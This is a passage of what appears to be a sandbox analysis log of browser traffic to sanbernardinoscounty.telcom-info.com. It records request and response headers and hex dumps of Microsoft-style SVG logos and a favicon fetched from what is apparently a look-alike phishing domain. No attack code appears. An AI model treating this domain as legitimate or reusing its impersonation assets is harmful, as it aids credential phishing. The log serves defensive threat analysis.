                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:18 UTC660INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:18 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1SEp9WV3CyuvJh7NPtz9w1UPkff9kkVIvD76NRV%2FvLF4nu4k84q996ZSmI6qIwryVXrpyMd35NBB2DPdWgyxavOw4SdCTrptZCevtwMIWrsBHtYqPsX0Kk17wHeK%2FYL9R5y%2Fd3vwOXxs5eoOVTxXIClbzpsj9WI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff887cdb10f83-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-01 22:43:18 UTC709INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                                          Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                                          2024-10-01 22:43:18 UTC890INData Raw: 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e 38 35 39 41 39 2e 32 36 39 2c 39 2e 32 36 39 2c 30 2c 30 2c 30 2c 32 32 2e 35 2c 31 30 2e 37 31 39 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2c 31 39 2c 31 30 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 33 2e 35 2e 37 2c 38 2e 39
                                                                          Data Ascii: ,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9
                                                                          2024-10-01 22:43:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.649812104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:18 UTC433OUTGET /logo_/5HwVWMJJMP8EV8z HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:18 UTC636INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:18 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ftW%2F8WPEVVy4J3wXvKrYFgZYC6ZDho64sTmE8VvziDuiL4J4y7G3Uq%2FIQ6SOGJdB0mRCAcToeFp6iLr9DDWPaFc0MGPZE%2F8a5DkVbiQzHf%2BUquXuPTLw5c%2BizBuuDI07iILwQN2aL3k%2FMO8Qh3rQSrPWIOziJdI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff887ced10f7c-EWR
                                                                          2024-10-01 22:43:18 UTC733INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                                          Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 33 37 35 2e 31 76 32 2e 33 35 38 61
                                                                          Data Ascii: 4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c 30 2c 30 2c
                                                                          Data Ascii: 1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,0,0,
                                                                          2024-10-01 22:43:18 UTC187INData Raw: 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                          Data Ascii: 10.931" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                                          2024-10-01 22:43:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.2.649811104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:18 UTC463OUTGET /logo_/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b03449ef HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:18 UTC632INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:18 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TGH9ppEcdWFxfLuuFvS6BepWY4nIN9VzIf%2F4irkFqIvUQIArylOlAymvvsMU9GOghjhRLvDa6ADGkwr7Uw3HScU7IBwra%2Bm%2BLXYMnitCVxCx6DVlon0TW0x7NQCTdiewVSUZ5Pp1qltzxfbz9jME5FLC%2Bvff8Io%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff887ddd81849-EWR
                                                                          2024-10-01 22:43:18 UTC737INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                                          Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c 30 2c 2e 38 31 33 2c 32 2e 33 33 38 2c 32 2e 39 33 36 2c 32 2e 39 33 36 2c 30 2c 30 2c 30 2c 32 2e 32 30 39 2e 38 33 37 4d 36 35 2e 34 2c 38 2e 33 34 33 61 32 2e 39 35 32 2c 32 2e 39 35 32 2c 30 2c 30 2c 31 2c 2e 35 2e 30 33 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 2e 33 37 35 2e 31 76 32 2e 33 35 38 61 32 2e 30 34
                                                                          Data Ascii: 1,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39 2c 33 2e 36 2c 33 2e 36 2c 30 2c 30 2c 30 2d 31 2e 32 32 32 2d 2e 32 32 31 2c 31 2e 37 38 31 2c 31 2e 37 38 31 2c 30 2c 30 2c 30 2d 31 2e 30 33 34 2e 32 36 2e 38 32 34 2e 38 32 34 2c 30 2c 30 2c 30 2d 2e 33 37 31 2e 37 31 32 4d 38 35 2e 32 37 38 2c 31 33 2e 36 41 35 2e 33 35 38 2c 35 2e 33 35 38 2c 30 2c 30 2c 31 2c 38 36
                                                                          Data Ascii: 3,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529,3.6,3.6,0,0,0-1.222-.221,1.781,1.781,0,0,0-1.034.26.824.824,0,0,0-.371.712M85.278,13.6A5.358,5.358,0,0,1,86
                                                                          2024-10-01 22:43:18 UTC183INData Raw: 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 37 66 62 61 30 30 22 2f 3e 3c 72 65 63 74 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 30 30 61 34 65 66 22 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 39 22 20 79 3d 22 31 32 2e 30 36 39 22 20 77 69 64 74 68 3d 22 31 30 2e 39 33 31 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 62 39 30 30 22 2f 3e 3c 2f 73 76 67 3e 0d 0a
                                                                          Data Ascii: 31" height="10.931" fill="#7fba00"/><rect y="12.069" width="10.931" height="10.931" fill="#00a4ef"/><rect x="12.069" y="12.069" width="10.931" height="10.931" fill="#ffb900"/></svg>
                                                                          2024-10-01 22:43:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.2.649810104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:18 UTC431OUTGET /fav/BxFYbJCBp2C7xgu HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5
                                                                          2024-10-01 22:43:18 UTC629INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:18 GMT
                                                                          Content-Type: image/x-icon
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YioiWHuPPLpRbqNVLBSXVrE1vtV8V597wwc6l91ym6Fwnj0yC%2Bw6dqEilg5cL%2FPu9u09mH%2FKt3e1OkPTb7hLD1hvCaDagQ9v5l9d5hTLmJHIsNpitvSjG72zKD9f2ilMBLrGDpKVYPgg4iogGagNO00NCstk9fA%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff8881a628c5d-EWR
                                                                          2024-10-01 22:43:18 UTC740INData Raw: 34 33 31 36 0d 0a 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33
                                                                          Data Ascii: 4316h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
                                                                          Data Ascii: """""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33
                                                                          Data Ascii: 33333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22
                                                                          Data Ascii: """""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"
                                                                          2024-10-01 22:43:18 UTC1369INData Raw: 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                                                                          Data Ascii: UUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUU
